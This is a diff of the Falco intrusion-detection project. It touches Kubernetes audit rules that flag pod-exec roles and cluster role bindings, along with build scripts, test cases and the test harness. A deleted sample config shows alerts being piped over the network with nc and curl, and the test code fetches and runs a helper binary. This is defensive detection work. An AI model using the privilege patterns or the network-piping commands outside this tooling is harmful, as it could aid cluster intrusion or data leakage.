@@ -274,7 +282,7 @@
- rule: ClusterRole With Pod Exec Created
desc: Detect any attempt to create a Role/ClusterRole that can exec to pods
condition: kevt and (role or clusterrole) and kcreate and ka.req.role.rules.resources intersects ("pods/exec")
condition: kevt and (role or clusterrole) and kcreate and ka.req.role.rules.resources contains "pods/exec"
output: Created Role/ClusterRole with pod exec privileges (user=%ka.user.name role=%ka.target.name rules=%ka.req.role.rules)
priority: WARNING
source: k8s_audit
@@ -388,7 +396,7 @@
- rule: K8s Role/Clusterrolebinding Created
desc: Detect any attempt to create a clusterrolebinding
condition: (kactivity and kcreate and clusterrolebinding and response_successful)
output: K8s Cluster Role Binding Created (user=%ka.user.name binding=%ka.target.name subjects=%ka.req.binding.subjects role=%ka.req.binding.role resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
output: K8s Cluster Role Binding Created (user=%ka.user.name binding=%ka.target.name subjects=%ka.req.binding.subjects role=%ka.req.binding.role resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason foo=%ka.req.binding.subject.has_name[cluster-admin])
priority: INFO
source: k8s_audit
tags: [k8s]

3
scripts/CMakeLists.txt
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

26
scripts/build
View File

@@ -1,26 +0,0 @@
#!/usr/bin/env bash
set -xeuo pipefail
SOURCE_DIR=$1
BUILD_DIR=$2
FALCOBUILDER_IMAGE="falcosecurity/falco-builder"
FALCOTESTER_IMAGE="falcosecurity/falco-tester"
docker run --user "$(id -u)":"$(id -g)" -v /etc/passwd:/etc/passwd:ro -e BUILD_TYPE="$BUILD_TYPE" -v "$SOURCE_DIR":/source -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" cmake
docker run --user "$(id -u)":"$(id -g)" -v /etc/passwd:/etc/passwd:ro -e BUILD_TYPE="$BUILD_TYPE" -v "$SOURCE_DIR":/source -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" package
docker run --user "$(id -u)":"$(id -g)" -v /etc/passwd:/etc/passwd:ro -e BUILD_TYPE="$BUILD_TYPE" -v "$SOURCE_DIR":/source -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" tests
# Deduct currently built version
CURRENT_FALCO_VERSION=$(docker run -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" bash -c "./build/$BUILD_TYPE/userspace/falco/falco --version" | cut -d' ' -f3 | tr -d '\r')
# Execute regression tests
docker run \
-v /boot:/boot:ro \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /etc/passwd:/etc/passwd:ro \
-v "$SOURCE_DIR":/source \
-v "$BUILD_DIR":/build \
-e BUILD_TYPE="$BUILD_TYPE" \
-e FALCO_VERSION="$CURRENT_FALCO_VERSION" \
"$FALCOTESTER_IMAGE" test

17
scripts/build-lpeg.sh
View File

@@ -1,7 +1,8 @@
#!/usr/bin/env bash
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -20,17 +21,17 @@ set -ex
PREFIX=$1
if [ -z "$PREFIX" ]; then
if [ -z $PREFIX ]; then
PREFIX=.
fi
mkdir -p $PREFIX
gcc -O2 -fPIC -I"$LUA_INCLUDE" -c lpcap.c -o $PREFIX/lpcap.o
gcc -O2 -fPIC -I"$LUA_INCLUDE" -c lpcode.c -o $PREFIX/lpcode.o
gcc -O2 -fPIC -I"$LUA_INCLUDE" -c lpprint.c -o $PREFIX/lpprint.o
gcc -O2 -fPIC -I"$LUA_INCLUDE" -c lptree.c -o $PREFIX/lptree.o
gcc -O2 -fPIC -I"$LUA_INCLUDE" -c lpvm.c -o $PREFIX/lpvm.o
gcc -O2 -fPIC -I$LUA_INCLUDE -c lpcap.c -o $PREFIX/lpcap.o
gcc -O2 -fPIC -I$LUA_INCLUDE -c lpcode.c -o $PREFIX/lpcode.o
gcc -O2 -fPIC -I$LUA_INCLUDE -c lpprint.c -o $PREFIX/lpprint.o
gcc -O2 -fPIC -I$LUA_INCLUDE -c lptree.c -o $PREFIX/lptree.o
gcc -O2 -fPIC -I$LUA_INCLUDE -c lpvm.c -o $PREFIX/lpvm.o
# For building lpeg.so, which we don't need now that we're statically linking lpeg.a into falco

3
scripts/debian/falco
View File

@@ -1,7 +1,8 @@
#! /bin/sh
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/debian/postinst.in
View File

@@ -1,7 +1,8 @@
#!/bin/sh
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/debian/postrm
View File

@@ -1,7 +1,8 @@
#!/bin/sh
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/debian/prerm.in
View File

@@ -1,7 +1,8 @@
#!/bin/sh
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

4
scripts/description.txt
View File

@@ -1 +1,3 @@
Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms such as Kubernetes, Mesosphere, and Cloud Foundry. Detect abnormal application behavior. Alert via Slack, Fluentd, NATS, and more. Protect your platform by taking action through serverless (FaaS) frameworks, or other automation.
Sysdig Falco instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events.
Then, using a rule-based configuration, you can specify filters for events of interest that you would like to log or be notified of.

6
scripts/ignored-calls.sh
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -16,6 +16,8 @@
# limitations under the License.
#
#!/bin/bash
cat ../sysdig/userspace/libscap/syscall_info_table.c | grep EF_DROP_FALCO | sed -e 's/.*\"\(.*\)\".*/\1/' | sort > ignored_syscall_info_table.txt
cat ../sysdig/driver/event_table.c | grep EF_DROP_FALCO | sed -e 's/[^\"]*\"\([^\"]*\)\".*/\1/' | sort | uniq > ignored_driver_event_table.txt
cat ../sysdig/userspace/libscap/event_table.c | grep EF_DROP_FALCO | sed -e 's/[^\"]*\"\([^\"]*\)\".*/\1/' | sort | uniq > ignored_userspace_event_table.txt

129
scripts/jenkins/build-pipeline/Jenkinsfile vendored
View File

@@ -1,95 +1,66 @@
void setBuildStatus(String context, String message, String state) {
step([
$class: "GitHubCommitStatusSetter",
reposSource: [
$class: "ManuallyEnteredRepositorySource",
url: "https://github.com/falcosecurity/falco"
],
contextSource: [
$class: "ManuallyEnteredCommitContextSource",
context: context
],
errorHandlers: [[
$class: "ChangingBuildStatusErrorHandler",
result: "UNSTABLE"
]],
statusResultSource: [
$class: "ConditionalStatusResultSource",
results: [[
$class: "AnyBuildResult",
message: message,
state: state
]]
]
]);
$class: "GitHubCommitStatusSetter",
reposSource: [$class: "ManuallyEnteredRepositorySource", url: "https://github.com/falcosecurity/falco"],
contextSource: [$class: "ManuallyEnteredCommitContextSource", context: context],
errorHandlers: [[$class: "ChangingBuildStatusErrorHandler", result: "UNSTABLE"]],
statusResultSource: [ $class: "ConditionalStatusResultSource", results: [[$class: "AnyBuildResult", message: message, state: state]] ]
]);
}
def version = 'UNKNOWN'
pipeline {
agent { label "agent-docker-builder" }
stages {
stage("Check out dependencies") {
steps {
dir("falco") {
checkout([
$class: "GitSCM",
branches: [[name: "refs/heads/"+env.BRANCH_NAME]],
doGenerateSubmoduleConfigurations: false,
extensions: [],
submoduleCfg: [],
userRemoteConfigs: [[
credentialsId: "github-jenkins-user-token",
url: "https://github.com/falcosecurity/falco"
]]
])
}
dir("sysdig") {
checkout([
$class: "GitSCM",
branches: [[name: "dev"]],
doGenerateSubmoduleConfigurations: false,
extensions: [],
submoduleCfg: [],
userRemoteConfigs: [[
credentialsId: "github-jenkins-user-token",
url: "https://github.com/draios/sysdig"
]]
])
steps {
dir("falco") {
checkout([$class: "GitSCM",
branches: [[name: "refs/heads/"+env.BRANCH_NAME]],
doGenerateSubmoduleConfigurations: false,
extensions: [],
submoduleCfg: [],
userRemoteConfigs: [[credentialsId: "github-jenkins-user-token", url: "https://github.com/draios/falco"]]])
}
dir("sysdig") {
checkout([$class: "GitSCM",
branches: [[name: "dev"]],
doGenerateSubmoduleConfigurations: false,
extensions: [],
submoduleCfg: [],
userRemoteConfigs: [[credentialsId: "github-jenkins-user-token", url: "https://github.com/draios/sysdig"]]])
}
}
}
stage("Build") {
steps {
script{
version = sh(returnStdout: true, script: "./falco/scripts/jenkins/build-pipeline/version")
sh("./falco/scripts/jenkins/build-pipeline/build ${version}")
}
}
post {
success {
setBuildStatus("Build", "Build Successful", "SUCCESS")
}
failure {
setBuildStatus("Build", "Build Failed", "FAILURE")
}
}
}
stage("Build") {
steps {
script{
sh("./falco/scripts/jenkins/build-pipeline/build.sh")
}
}
post {
success {
setBuildStatus("Build", "Build Successful", "SUCCESS")
}
failure {
setBuildStatus("Build", "Build Failed", "FAILURE")
}
}
}
stage("Run tests") {
steps {
script{
sh("./falco/scripts/jenkins/build-pipeline/run-tests ${version}")
}
}
post {
success {
setBuildStatus("Run tests", "All tests passed", "SUCCESS")
}
failure {
setBuildStatus("Run tests", "One or more tests failed", "FAILURE")
}
}
steps {
script{
sh("./falco/scripts/jenkins/build-pipeline/run-tests.sh")
}
}
post {
success {
setBuildStatus("Run tests", "All tests passed", "SUCCESS")
}
failure {
setBuildStatus("Run tests", "One or more tests failed", "FAILURE")
}
}
}
}
post {
always {

28
scripts/jenkins/build-pipeline/build
View File

@@ -1,28 +0,0 @@
#!/usr/bin/env bash
set -eu -o pipefail
if [ $# -eq 0 ]; then
>&2 echo "Missing arguments."
exit 1
fi
if [ -z "$1" ]; then
>&2 echo "Missing version."
exit 1
fi
if [ "$1" == "UNKNOWN" ]; then
>&2 echo "Unknown version."
exit 1
fi
FALCO_VERSION=$1
BUILD_DIR="${WORKSPACE}/build"
FALCOBUILDER_IMAGE="falcosecurity/falco-builder"
docker pull $FALCOBUILDER_IMAGE
rm -rf "$BUILD_DIR"
mkdir "$BUILD_DIR"
docker run -u "$(id -u):$(id -g)" -v /etc/passwd:/etc/passwd:ro -e FALCO_VERSION="$FALCO_VERSION" -v "$WORKSPACE":/source -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" cmake
docker run -u "$(id -u):$(id -g)" -v /etc/passwd:/etc/passwd:ro -e FALCO_VERSION="$FALCO_VERSION" -v $"$WORKSPACE":/source -v "$BUILD_DIR":/build "$FALCOBUILDER_IMAGE" package

11
scripts/jenkins/build-pipeline/build.sh Executable file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
set -xeuo pipefail
export FALCO_VERSION=0.1.$((2700+BUILD_NUMBER))dev
rm -rf ${WORKSPACE}/build
mkdir ${WORKSPACE}/build
docker run --user $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -e FALCO_VERSION=${FALCO_VERSION} -e MAKE_JOBS=4 -v ${WORKSPACE}:/source -v ${WORKSPACE}/build:/build falcosecurity/falco-builder cmake
docker run --user $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -e FALCO_VERSION=${FALCO_VERSION} -e MAKE_JOBS=4 -v ${WORKSPACE}:/source -v ${WORKSPACE}/build:/build falcosecurity/falco-builder package

33
scripts/jenkins/build-pipeline/run-tests
View File

@@ -1,33 +0,0 @@
#!/usr/bin/env bash
set -eu -o pipefail
if [ $# -eq 0 ]; then
>&2 echo "Missing arguments."
exit 1
fi
if [ -z "$1" ]; then
>&2 echo "Missing version."
exit 1
fi
if [ "$1" == "UNKNOWN" ]; then
>&2 echo "Unknown version."
exit 1
fi
FALCO_VERSION=$1
BUILD_DIR="${WORKSPACE}/build"
FALCOTESTER_IMAGE="falcosecurity/falco-tester"
docker pull $FALCOTESTER_IMAGE
docker run \
-v /boot:/boot:ro \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /etc/passwd:/etc/passwd:ro \
-e FALCO_VERSION="$FALCO_VERSION" \
-v "$WORKSPACE":/source \
-v "$BUILD_DIR":/build \
"$FALCOTESTER_IMAGE" test
exit 0

10
scripts/jenkins/build-pipeline/run-tests.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/bin/bash
set -xeuo pipefail
export FALCO_VERSION=0.1.$((2700+BUILD_NUMBER))dev
docker pull falcosecurity/falco-tester
docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v /etc/passwd:/etc/passwd:ro -e FALCO_VERSION=${FALCO_VERSION} -v ${WORKSPACE}:/source -v ${WORKSPACE}/build:/build falcosecurity/falco-tester
exit 0

23
scripts/jenkins/build-pipeline/version
View File

@@ -1,23 +0,0 @@
#!/usr/bin/env bash
# Do not add "x"
set -eu -o pipefail
BUILD_DIR="${WORKSPACE}/build"
FALCOBUILDER_IMAGE="falcosecurity/falco-builder"
docker pull $FALCOBUILDER_IMAGE > /dev/null
rm -rf "$BUILD_DIR"
mkdir "$BUILD_DIR"
CMAKE_CMD="docker run -u $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -v $WORKSPACE:/source -v $BUILD_DIR:/build -a stdout -a stderr $FALCOBUILDER_IMAGE cmake"
FALCO_VERSION=$($CMAKE_CMD | grep -oP "Falco version: v?\K(\d+)\.[a-z0-9]{1,7}(\.[a-z0-9]+)?" || echo "UNKNOWN")
if [ "$FALCO_VERSION" == "UNKNOWN" ]; then
>&2 echo "Unknown version."
exit 1
fi
echo "$FALCO_VERSION.$((2700+BUILD_NUMBER))"

3
scripts/rpm/falco
View File

@@ -1,8 +1,9 @@
#!/bin/sh
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/rpm/postinstall
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/rpm/postuninstall
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
scripts/rpm/preuninstall
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

1
test/.gitignore vendored
View File

@@ -1 +0,0 @@
falco_traces.yaml

2
test/OWNERS
View File

@@ -1,2 +0,0 @@
labels:
- area/tests

3
test/confs/file_output.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
test/confs/program_output.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

165
test/confs/psp.yaml
View File

@@ -1,165 +0,0 @@
#
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File(s) or Directories containing Falco rules, loaded at startup.
# The name "rules_file" is only for backwards compatibility.
# If the entry is a file, it will be read directly. If the entry is a directory,
# every file in that directory will be read, in alphabetical order.
#
# falco_rules.yaml ships with the falco package and is overridden with
# every new software version. falco_rules.local.yaml is only created
# if it doesn't exist. If you want to customize the set of rules, add
# your customizations to falco_rules.local.yaml.
#
# The files will be read in the order presented here, so make sure if
# you have overrides they appear in later files.
rules_file: []
# If true, the times displayed in log messages and output messages
# will be in ISO 8601. By default, times are displayed in the local
# time zone, as governed by /etc/localtime.
time_format_iso_8601: false
# Whether to output events in json or text
json_output: false
# When using json output, whether or not to include the "output" property
# itself (e.g. "File below a known binary directory opened for writing
# (user=root ....") in the json output.
json_include_output_property: true
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: true
log_syslog: true
# Minimum log level to include in logs. Note: these levels are
# separate from the priority field of rules. This refers only to the
# log level of falco's internal logging. Can be one of "emergency",
# "alert", "critical", "error", "warning", "notice", "info", "debug".
log_level: info
# Minimum rule priority level to load and run. All rules having a
# priority more severe than this level will be loaded/run. Can be one
# of "emergency", "alert", "critical", "error", "warning", "notice",
# "info", "debug".
priority: debug
# Whether or not output to any of the output channels below is
# buffered. Defaults to false
buffered_outputs: false
# Falco uses a shared buffer between the kernel and userspace to pass
# system call information. When falco detects that this buffer is
# full and system calls have been dropped, it can take one or more of
# the following actions:
# - "ignore": do nothing. If an empty list is provided, ignore is assumed.
# - "log": log a CRITICAL message noting that the buffer was full.
# - "alert": emit a falco alert noting that the buffer was full.
# - "exit": exit falco with a non-zero rc.
#
# The rate at which log/alert messages are emitted is governed by a
# token bucket. The rate corresponds to one message every 30 seconds
# with a burst of 10 messages.
syscall_event_drops:
actions:
- log
- alert
rate: .03333
max_burst: 10
# A throttling mechanism implemented as a token bucket limits the
# rate of falco notifications. This throttling is controlled by the following configuration
# options:
# - rate: the number of tokens (i.e. right to send a notification)
# gained per second. Defaults to 1.
# - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
#
# With these defaults, falco could send up to 1000 notifications after
# an initial quiet period, and then up to 1 notification per second
# afterward. It would gain the full burst back after 1000 seconds of
# no activity.
outputs:
rate: 1
max_burst: 1000
# Where security notifications should go.
# Multiple outputs can be enabled.
syslog_output:
enabled: true
# If keep_alive is set to true, the file will be opened once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the file will be re-opened
# for each output message.
#
# Also, the file will be closed and reopened if falco is signaled with
# SIGUSR1.
file_output:
enabled: false
keep_alive: false
filename: ./events.txt
stdout_output:
enabled: true
# Falco contains an embedded webserver that can be used to accept K8s
# Audit Events. These config options control the behavior of that
# webserver. (By default, the webserver is disabled).
#
# The ssl_certificate is a combination SSL Certificate and corresponding
# key contained in a single file. You can generate a key/cert as follows:
#
# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# $ cat certificate.pem key.pem > falco.pem
# $ sudo cp falco.pem /etc/falco/falco.pem
webserver:
enabled: true
listen_port: 8765
k8s_audit_endpoint: /k8s_audit
ssl_enabled: false
ssl_certificate: /etc/falco/falco.pem
# Possible additional things you might want to do with program output:
# - send to a slack webhook:
# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
# - logging (alternate method than syslog):
# program: logger -t falco-test
# - send over a network connection:
# program: nc host.example.com 80
# If keep_alive is set to true, the program will be started once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the program will be re-spawned
# for each output message.
#
# Also, the program will be closed and reopened if falco is signaled with
# SIGUSR1.
program_output:
enabled: false
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
http_output:
enabled: false
url: http://some.url

5
test/cpu_monitor.sh
View File

@@ -1,7 +1,8 @@
#!/usr/bin/env bash
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

67
test/falco_k8s_audit_tests.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -16,68 +17,6 @@
#
trace_files: !mux
compat_engine_v4_create_disallowed_pod:
detect: True
detect_level: WARNING
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
- ./rules/k8s_audit/engine_v4/allow_only_apache_container.yaml
detect_counts:
- Create Disallowed Pod: 1
trace_file: trace_files/k8s_audit/create_nginx_pod_unprivileged.json
compat_engine_v4_create_allowed_pod:
detect: False
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
- ./rules/k8s_audit/engine_v4/allow_nginx_container.yaml
trace_file: trace_files/k8s_audit/create_nginx_pod_unprivileged.json
compat_engine_v4_create_privileged_pod:
detect: True
detect_level: WARNING
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
detect_counts:
- Create Privileged Pod: 1
trace_file: trace_files/k8s_audit/create_nginx_pod_privileged.json
compat_engine_v4_create_privileged_trusted_pod:
detect: False
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
- ./rules/k8s_audit/trust_nginx_container.yaml
trace_file: trace_files/k8s_audit/create_nginx_pod_privileged.json
compat_engine_v4_create_unprivileged_pod:
detect: False
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
trace_file: trace_files/k8s_audit/create_nginx_pod_unprivileged.json
compat_engine_v4_create_hostnetwork_pod:
detect: True
detect_level: WARNING
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
detect_counts:
- Create HostNetwork Pod: 1
trace_file: trace_files/k8s_audit/create_nginx_pod_hostnetwork.json
compat_engine_v4_create_hostnetwork_trusted_pod:
detect: False
rules_file:
- ../rules/falco_rules.yaml
- ./rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
- ./rules/k8s_audit/trust_nginx_container.yaml
trace_file: trace_files/k8s_audit/create_nginx_pod_hostnetwork.json
user_outside_allowed_set:
detect: True
detect_level: WARNING
@@ -575,4 +514,4 @@ trace_files: !mux
- ../rules/k8s_audit_rules.yaml
detect_counts:
- K8s Role/Clusterrolebinding Deleted: 1
trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json
trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json

54
test/falco_test.py
View File

@@ -1,7 +1,8 @@
#!/usr/bin/env python
#!/usr/bin/env python
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -21,10 +22,7 @@ import json
import sets
import glob
import shutil
import stat
import subprocess
import sys
import urllib
from avocado import Test
from avocado.utils import process
@@ -36,14 +34,12 @@ class FalcoTest(Test):
"""
Load the sysdig kernel module if not already loaded.
"""
build_dir = "/build"
if 'BUILD_DIR' in os.environ:
build_dir = os.environ['BUILD_DIR']
build_type = "Release"
if 'BUILD_TYPE' in os.environ:
build_type = os.environ['BUILD_TYPE']
self.falcodir = self.params.get('falcodir', '/', default=build_dir)
self.psp_conv_path = os.path.join(build_dir, "falcoctl")
self.psp_conv_url = "https://github.com/falcosecurity/falcoctl/releases/download/v0.0.4/falcoctl-0.0.4-linux-amd64"
build_dir = os.path.join('/build', build_type)
self.falcodir = self.params.get('falcodir', '/', default=os.path.join(self.basedir, build_dir))
self.stdout_is = self.params.get('stdout_is', '*', default='')
self.stderr_is = self.params.get('stderr_is', '*', default='')
@@ -98,15 +94,8 @@ class FalcoTest(Test):
if not isinstance(self.validate_rules_file, list):
self.validate_rules_file = [self.validate_rules_file]
self.psp_rules_file = os.path.join(build_dir, "psp_rules.yaml")
self.psp_file = self.params.get('psp_file', '*', default="")
self.rules_args = ""
if self.psp_file != "":
self.rules_args = self.rules_args + "-r " + self.psp_rules_file + " "
for file in self.validate_rules_file:
if not os.path.isabs(file):
file = os.path.join(self.basedir, file)
@@ -279,7 +268,7 @@ class FalcoTest(Test):
triggered_rules = match.group(1)
for rule, count in self.detect_counts.iteritems():
expected = '\s{}: (\d+)'.format(re.sub(r'([$\.*+?()[\]{}|^])', r'\\\1', rule))
expected = '\s{}: (\d+)'.format(rule)
match = re.search(expected, triggered_rules)
if match is None:
@@ -437,31 +426,6 @@ class FalcoTest(Test):
if self.trace_file:
trace_arg = "-e {}".format(self.trace_file)
# Possibly run psp converter
if self.psp_file != "":
if not os.path.isfile(self.psp_conv_path):
self.log.info("Downloading {} to {}".format(self.psp_conv_url, self.psp_conv_path))
urllib.urlretrieve(self.psp_conv_url, self.psp_conv_path)
os.chmod(self.psp_conv_path, stat.S_IEXEC)
conv_cmd = '{} convert psp --psp-path {} --rules-path {}'.format(
self.psp_conv_path, os.path.join(self.basedir, self.psp_file), self.psp_rules_file)
conv_proc = process.SubProcess(conv_cmd)
conv_res = conv_proc.run(timeout=180, sig=9)
if conv_res.exit_status != 0:
self.error("psp_conv command \"{}\" exited with unexpected return value {}. Full stdout={} stderr={}".format(
conv_cmd, conv_res.exit_status, conv_res.stdout, conv_res.stderr))
with open(self.psp_rules_file, 'r') as myfile:
psp_rules = myfile.read()
self.log.debug("Converted Rules: {}".format(psp_rules))
# Run falco
cmd = '{} {} {} -c {} {} -o json_output={} -o json_include_output_property={} -o priority={} -v'.format(
self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.json_include_output_property, self.priority)

167
test/falco_tests.yaml
View File

@@ -86,15 +86,6 @@ trace_files: !mux
- rules/rule_names_with_spaces.yaml
trace_file: trace_files/cat_write.scap
rule_names_with_regex_chars:
detect: True
detect_level: WARNING
rules_file:
- rules/rule_names_with_regex_chars.yaml
detect_counts:
- 'Open From Cat ($\.*+?()[]{}|^)': 8
trace_file: trace_files/cat_write.scap
multiple_rules_first_empty:
detect: True
detect_level: WARNING
@@ -123,18 +114,6 @@ trace_files: !mux
trace_file: trace_files/cat_write.scap
all_events: True
multiple_docs:
detect: True
detect_level:
- WARNING
- INFO
- ERROR
rules_file:
- rules/single_rule.yaml
- rules/double_rule.yaml
trace_file: trace_files/cat_write.scap
all_events: True
rules_directory:
detect: True
detect_level:
@@ -414,148 +393,6 @@ trace_files: !mux
- rules/rule_append_failure.yaml
trace_file: trace_files/cat_write.scap
invalid_overwrite_macro:
exit_status: 1
stdout_contains: |+
.*invalid_base_macro.yaml: Ok
.*invalid_overwrite_macro.yaml: Compilation error when compiling "foo": Undefined macro 'foo' used in filter.
---
- macro: some macro
condition: foo
append: false
---
validate_rules_file:
- rules/invalid_base_macro.yaml
- rules/invalid_overwrite_macro.yaml
trace_file: trace_files/cat_write.scap
invalid_append_macro:
exit_status: 1
stdout_contains: |+
.*invalid_base_macro.yaml: Ok
.*invalid_append_macro.yaml: Compilation error when compiling "evt.type=execve foo": 17: syntax error, unexpected 'foo', expecting 'or', 'and'
---
- macro: some macro
condition: evt.type=execve
- macro: some macro
condition: foo
append: true
---
validate_rules_file:
- rules/invalid_base_macro.yaml
- rules/invalid_append_macro.yaml
trace_file: trace_files/cat_write.scap
invalid_overwrite_macro_multiple_docs:
exit_status: 1
stdout_is: |+
Compilation error when compiling "foo": Undefined macro 'foo' used in filter.
---
- macro: some macro
condition: foo
append: false
---
validate_rules_file:
- rules/invalid_overwrite_macro_multiple_docs.yaml
trace_file: trace_files/cat_write.scap
invalid_append_macro_multiple_docs:
exit_status: 1
stdout_is: |+
Compilation error when compiling "evt.type=execve foo": 17: syntax error, unexpected 'foo', expecting 'or', 'and'
---
- macro: some macro
condition: evt.type=execve
- macro: some macro
condition: foo
append: true
---
validate_rules_file:
- rules/invalid_append_macro_multiple_docs.yaml
trace_file: trace_files/cat_write.scap
invalid_overwrite_rule:
exit_status: 1
stdout_contains: |+
.*invalid_base_rule.yaml: Ok
.*invalid_overwrite_rule.yaml: Undefined macro 'bar' used in filter.
---
- rule: some rule
desc: some desc
condition: bar
output: some output
priority: INFO
append: false
---
validate_rules_file:
- rules/invalid_base_rule.yaml
- rules/invalid_overwrite_rule.yaml
trace_file: trace_files/cat_write.scap
invalid_append_rule:
exit_status: 1
stdout_contains: |+
.*invalid_base_rule.yaml: Ok
.*invalid_append_rule.yaml: Compilation error when compiling "evt.type=open bar": 15: syntax error, unexpected 'bar', expecting 'or', 'and'
---
- rule: some rule
desc: some desc
condition: evt.type=open
output: some output
priority: INFO
- rule: some rule
